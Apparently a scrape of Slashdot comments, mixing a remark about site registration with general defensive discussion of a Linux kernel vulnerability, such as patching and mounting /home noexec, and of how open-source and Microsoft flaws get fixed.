The answer is no. It's not "a good thing", it's not necessarily a bad thing either. Slashdot's ability to give Anonymous Users the luxery to both view and post is rare, but since I'm directing traffic from here, I thought it appropriate to let everyone know that if they "want in" they'll have to register. It's a time saving measure for those who are interested in looking, but wouldn't be willing to register.
My comment serves the same purpose as the NYTimes links where "(soul sucking registration required)" warnings are common.
Kinetic stupidity has a new brand leader: Allen Zadr.
Thanks for clearing that up for us, Darl.
Obviously everybody should either patch their kernel or upgrade to a new one to fix this problem. But in the meantime, set the noexec bit on /home and problem solved.
This is another good reason to have /, /usr, /tmp, etc., each on separate partitions.
Just my $0.02 worth.
At least monthly. And note that the recent "zero-day" IE exploit was based on a known bug which Microsoft didn't fix because they couldn't see how it would be used. FOSS people would (do) fix it anyway.
Two observations worth noting are that the Linux problems are actually being found and fixed: many of them are falling out of deliberate efforts to purify the kernel, whereas the corresponding problems in the MS-Windows core are not being found - at least, not by white-hats; and that if a DOS is the worst that can be found in Linux in... how long...? then we don't have all that much to worry about (but I'm glad that there are people out there worrying on my behalf anyway).
Got time? Spend some of it coding or testing